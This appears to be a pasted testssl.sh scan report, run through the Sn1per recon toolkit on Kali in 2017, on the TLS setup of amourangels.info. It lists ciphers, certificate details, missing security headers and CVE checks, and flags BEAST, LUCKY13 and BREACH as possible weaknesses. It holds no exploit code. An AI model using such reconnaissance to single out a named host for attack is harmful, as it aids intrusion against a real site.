- Accepted TLSv1.2 [32m128[0m bits AES128-GCM-SHA256
- Accepted TLSv1.2 [32m256[0m bits AES256-GCM-SHA384
- Accepted TLSv1.2 [32m128[0m bits AES128-SHA256
- Accepted TLSv1.2 [32m256[0m bits AES256-SHA256
- Accepted TLSv1.2 [32m128[0m bits AES128-SHA
- Accepted TLSv1.2 [32m256[0m bits AES256-SHA
- [32mPreferred[0m TLSv1.1 [32m128[0m bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 [32m256[0m bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 [32m128[0m bits AES128-SHA
- Accepted TLSv1.1 [32m256[0m bits AES256-SHA
- [32mPreferred[0m [33mTLSv1.0[0m [32m128[0m bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted [33mTLSv1.0[0m [32m256[0m bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted [33mTLSv1.0[0m [32m128[0m bits AES128-SHA
- Accepted [33mTLSv1.0[0m [32m256[0m bits AES256-SHA
- [1;34mSSL Certificate:[0m
- Signature Algorithm: [32msha256WithRSAEncryption[0m
- RSA Key Strength: 2048
- Subject: amourangels.info
- Altnames: DNS:amourangels.info, DNS:autodiscover.amourangels.info, DNS:cpanel.amourangels.info, DNS:mail.amourangels.info, DNS:webdisk.amourangels.info, DNS:webmail.amourangels.info, DNS:www.amourangels.info
- Issuer: cPanel, Inc. Certification Authority
- Not valid before: [32mSep 21 00:00:00 2017 GMT[0m
- Not valid after: [32mDec 20 23:59:59 2017 GMT[0m
- [1m
- ###########################################################
- testssl 2.9dev from [m[1mhttps://testssl.sh/dev/[m
- [1m
- This program is free software. Distribution and
- modification under GPLv2 permitted.
- USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
- Please file bugs @ [m[1mhttps://testssl.sh/bugs/[m
- [1m
- ###########################################################[m
- Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
- on Kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
- (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
- [7m Start 2017-09-26 17:40:48 -->> 104.140.246.148:443 (amourangels.info) <<--[m
- rDNS (104.140.246.148): server1.dating-club2007.club.
- ns1.dating-club2007.club.
- Service detected: HTTP
- [1m[4m Testing protocols [m[4mvia sockets except SPDY+HTTP2 [m
- [1m SSLv2 [m[1;32mnot offered (OK)[m
- [1m SSLv3 [m[1;32mnot offered (OK)[m
- [1m TLS 1 [moffered
- [1m TLS 1.1 [moffered
- [1m TLS 1.2 [m[1;32moffered (OK)[m
- [1m SPDY/NPN [mh2, spdy/3.1, spdy/3, spdy/2, http/1.1 (advertised)
- [1m HTTP2/ALPN [mh2, spdy/3.1, http/1.1, spdy/2, spdy/3 (offered)
- [1m[4m Testing ~standard cipher categories [m
- [1m NULL ciphers (no encryption) [m[1;32mnot offered (OK)[m
- [1m Anonymous NULL Ciphers (no authentication) [m[1;32mnot offered (OK)[m
- [1m Export ciphers (w/o ADH+NULL) [m[1;32mnot offered (OK)[m
- [1m LOW: 64 Bit + DES encryption (w/o export) [m[1;32mnot offered (OK)[m
- [1m Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) [m[0;32mnot offered (OK)[m
- [1m Triple DES Ciphers (Medium) [mnot offered (OK)
- [1m High encryption (AES+Camellia, no AEAD) [m[0;32moffered (OK)[m
- [1m Strong encryption (AEAD ciphers) [m[1;32moffered (OK)[m
- [1m[4m Testing robust (perfect) forward secrecy[m[4m, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4 [m
- [0;32m PFS is offered (OK)[m ECDHE-RSA-AES256-GCM-SHA384
- ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
- ECDHE-RSA-CHACHA20-POLY1305
- ECDHE-RSA-AES128-GCM-SHA256
- ECDHE-RSA-AES128-SHA256 ECDHE-RSA-AES128-SHA
- [1m Elliptic curves offered: [m[0;32mprime256v1[m
- [1m[4m Testing server preferences [m
- [1m Has server cipher order? [m[1;32myes (OK)[m
- [1m Negotiated protocol [m[1;32mTLSv1.2[m
- [1m Negotiated cipher [m[1;32mECDHE-RSA-AES128-GCM-SHA256[m, [0;32m256 bit ECDH (P-256)[m
- [1m Cipher order[m
- TLSv1: ECDHE-RSA-AES128-SHA ECDHE-RSA-AES256-SHA AES128-SHA AES256-SHA
- TLSv1.1: ECDHE-RSA-AES128-SHA ECDHE-RSA-AES256-SHA AES128-SHA AES256-SHA
- TLSv1.2: ECDHE-RSA-CHACHA20-POLY1305 ECDHE-RSA-AES128-GCM-SHA256
- ECDHE-RSA-AES256-GCM-SHA384 ECDHE-RSA-AES128-SHA256
- ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES128-SHA
- ECDHE-RSA-AES256-SHA AES128-GCM-SHA256 AES256-GCM-SHA384
- AES128-SHA256 AES256-SHA256 AES128-SHA AES256-SHA
- [1m[4m Testing server defaults (Server Hello) [m
- [1m TLS extensions (standard) [m"renegotiation info/#65281" "server name/#0"
- "status request/#5" "next protocol/#13172"
- "EC point formats/#11"
- "extended master secret/#23"
- "application layer protocol negotiation/#16"
- [1m Session Ticket RFC 5077 hint [m(no lifetime advertised)
- [1m SSL Session ID support [myes
- [1m Session Resumption [mTickets: yes, ID: yes
- [1m TLS clock skew[m -1 sec from localtime
- [1m Signature Algorithm [m[0;32mSHA256 with RSA[m
- [1m Server key size [mRSA 2048 bits
- [1m Fingerprint / Serial [mSHA1 AEDE924F1243327142E7B33AD2F03010B9390D4C / 488B5892E01C2B2457CD629A118352AD
- SHA256 9461C76C28F5DBBEEEC09BD2C4C4CE42964F7CFD53FB3872E938885B7AD0D3AB
- [1m Common Name (CN) [m[3mamourangels.info[m (CN in response to request w/o SNI: [3mappreframe.com[m)
- [1m subjectAltName (SAN) [m[3mamourangels.info autodiscover.amourangels.info
- cpanel.amourangels.info mail.amourangels.info
- webdisk.amourangels.info webmail.amourangels.info
- www.amourangels.info [m
- [1m Issuer [m[3mcPanel, Inc. Certification Authority[m ([3mcPanel, Inc.[m from [3mUS[m)
- [1m Trust (hostname) [m[0;32mOk via SAN and CN[m (same w/o SNI)
- [1m Chain of trust[m [0;32mOk [m[0;35m[m
- [1m EV cert[m (experimental) no
- [1m Certificate Expiration [m[0;32m85 >= 60 days[m (2017-09-20 20:00 --> 2017-12-20 18:59 -0500)
- [1m # of certificates provided[m 3
- [1m Certificate Revocation List [mhttp://crl.comodoca.com/cPanelIncCertificationAuthority.crl
- [1m OCSP URI [mhttp://ocsp.comodoca.com
- [1m OCSP stapling [m[0;32moffered[m
- [1m OCSP must staple [mno
- [1m DNS CAA RR[m (experimental) [1;33m--[m
- [1m Certificate Transparency [mno
- [1m[4m Testing HTTP header response @ "/" [m
- [1m HTTP Status Code [m 200 OK
- [1m HTTP clock skew [m-1 sec from localtime
- [1m Strict Transport Security [m--
- [1m Public Key Pinning [m--
- [1m Server banner [mLiteSpeed
- [1m Application banner [m--
- [1m Cookie(s) [m(none issued at "/")
- [1m Security headers [m[0;33m--[m
- [1m Reverse Proxy banner [m--
- [1m[4m Testing vulnerabilities [m
- [1m Heartbleed[m (CVE-2014-0160) [1;32mnot vulnerable (OK)[m, no heartbeat extension
- [1m CCS[m (CVE-2014-0224) [1;32mnot vulnerable (OK)[m
- [1m Ticketbleed[m (CVE-2016-9244), experiment. [1;32mnot vulnerable (OK)[m, no session ticket extension
- [1m Secure Renegotiation [m(CVE-2009-3555) [1;32mnot vulnerable (OK)[m
- [1m Secure Client-Initiated Renegotiation [m[0;32mnot vulnerable (OK)[m
- [1m CRIME, TLS [m(CVE-2012-4929) [0;32mnot vulnerable (OK)[m
- [1m BREACH[m (CVE-2013-3587) [0;31mpotentially NOT ok, uses gzip HTTP compression.[m - only supplied "/" tested
- Can be ignored for static pages or if no secrets in the page
- [1m POODLE, SSL[m (CVE-2014-3566) [1;32mnot vulnerable (OK)[m
- [1m TLS_FALLBACK_SCSV[m (RFC 7507) [0;32mDowngrade attack prevention supported (OK)[m
- [1m SWEET32[m (CVE-2016-2183, CVE-2016-6329) [1;32mnot vulnerable (OK)[m
- [1m FREAK[m (CVE-2015-0204) [1;32mnot vulnerable (OK)[m
- [1m DROWN[m (CVE-2016-0800, CVE-2016-0703) [1;32mnot vulnerable on this host and port (OK)[m
- make sure you don't use this certificate elsewhere with SSLv2 enabled services
- https://censys.io/ipv4?q=9461C76C28F5DBBEEEC09BD2C4C4CE42964F7CFD53FB3872E938885B7AD0D3AB could help you to find out
- [1m LOGJAM[m (CVE-2015-4000), experimental [0;32mnot vulnerable (OK):[m no DH EXPORT ciphers, no DH key detected
- [1m BEAST[m (CVE-2011-3389) TLS1: [1;33mECDHE-RSA-AES128-SHA
- ECDHE-RSA-AES256-SHA
- AES128-SHA AES256-SHA [m
- [1;33mVULNERABLE[m -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
- [1m LUCKY13[m (CVE-2013-0169), experimental potentially [1;33mVULNERABLE[m, uses cipher block chaining (CBC) ciphers with TLS
- [1m RC4[m (CVE-2013-2566, CVE-2015-2808) [0;32mno RC4 ciphers detected (OK)[m
- [1m[4m Testing 359 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength [m
- Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
- -----------------------------------------------------------------------------------------------------------------------------
- xc030 ECDHE-RSA-AES256-GCM-SHA384 ECDH[0;32m 256[m AESGCM 256 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
- xc028 ECDHE-RSA-AES256-SHA384 ECDH[0;32m 256[m AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
- xc014 ECDHE-RSA-AES256-SHA ECDH[0;32m 256[m AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
- xcca8 ECDHE-RSA-CHACHA20-POLY1305 ECDH[0;32m 256[m ChaCha20 256 TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256
- x9d AES256-GCM-SHA384 RSA AESGCM 256 TLS_RSA_WITH_AES_256_GCM_SHA384
- x3d AES256-SHA256 RSA AES 256 TLS_RSA_WITH_AES_256_CBC_SHA256
- x35 AES256-SHA RSA AES 256 TLS_RSA_WITH_AES_256_CBC_SHA
- xc02f ECDHE-RSA-AES128-GCM-SHA256 ECDH[0;32m 256[m AESGCM 128 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
- xc027 ECDHE-RSA-AES128-SHA256 ECDH[0;32m 256[m AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
- xc013 ECDHE-RSA-AES128-SHA ECDH[0;32m 256[m AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
- x9c AES128-GCM-SHA256 RSA AESGCM 128 TLS_RSA_WITH_AES_128_GCM_SHA256
- x3c AES128-SHA256 RSA AES 128 TLS_RSA_WITH_AES_128_CBC_SHA256
- x2f AES128-SHA RSA AES 128 TLS_RSA_WITH_AES_128_CBC_SHA
- [1m[4m Running client simulations via sockets [m
- Android 2.3.7
- [0;35mUnable to open a socket to 104.140.246.148:443. [mNo connection
- Android 4.1.1 TLSv1.0 ECDHE-RSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
- Android 4.3 TLSv1.0 ECDHE-RSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
- Android 4.4.2 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- Android 5.0.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- Android 6.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- Android 7.0 TLSv1.2 ECDHE-RSA-CHACHA20-POLY1305, [0;32m256 bit ECDH (P-256)[m
- Chrome 51 Win 7 TLSv1.2 ECDHE-RSA-CHACHA20-POLY1305, [0;32m256 bit ECDH (P-256)[m
- Chrome 57 Win 7 No connection
- Firefox 49 Win 7 TLSv1.2 ECDHE-RSA-CHACHA20-POLY1305, [0;32m256 bit ECDH (P-256)[m
- Firefox 53 Win 7 No connection
- IE 6 XP
- [0;35mUnable to open a socket to 104.140.246.148:443. [mNo connection
- IE 7 Vista TLSv1.0 ECDHE-RSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
- IE 8 XP No connection
- IE 8 Win 7 TLSv1.0 ECDHE-RSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
- IE 11 Win 7 TLSv1.2 ECDHE-RSA-AES128-SHA256, [0;32m256 bit ECDH (P-256)[m
- IE 11 Win 8.1 TLSv1.2 ECDHE-RSA-AES128-SHA256, [0;32m256 bit ECDH (P-256)[m
- IE 11 Win Phone 8.1 Update TLSv1.2 ECDHE-RSA-AES128-SHA256, [0;32m256 bit ECDH (P-256)[m
- IE 11 Win 10 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- Edge 13 Win 10 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- Edge 13 Win Phone 10 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- Opera 17 Win 7 TLSv1.2 ECDHE-RSA-AES128-SHA256, [0;32m256 bit ECDH (P-256)[m
- Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-RSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
- Safari 7 iOS 7.1 TLSv1.2 ECDHE-RSA-AES128-SHA256, [0;32m256 bit ECDH (P-256)[m
- Safari 9 OS X 10.11
- [0;35mUnable to open a socket to 104.140.246.148:443. [mNo connection
- Safari 10 OS X 10.12 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- Apple ATS 9 iOS 9 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- Tor 17.0.9 Win 7
- [0;35mUnable to open a socket to 104.140.246.148:443. [mNo connection
- Java 6u45 TLSv1.0 AES128-SHA
- Java 7u25 TLSv1.0 ECDHE-RSA-AES128-SHA, [0;32m256 bit ECDH (P-256)[m
- Java 8u31
- [0;35mUnable to open a socket to 104.140.246.148:443. [mNo connection
- OpenSSL 1.0.1l
- [0;35mUnable to open a socket to 104.140.246.148:443. [mNo connection
- OpenSSL 1.0.2e TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
- [7m Done 2017-09-26 17:59:11 [1105s] -->> 104.140.246.148:443 (amourangels.info) <<--[m
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement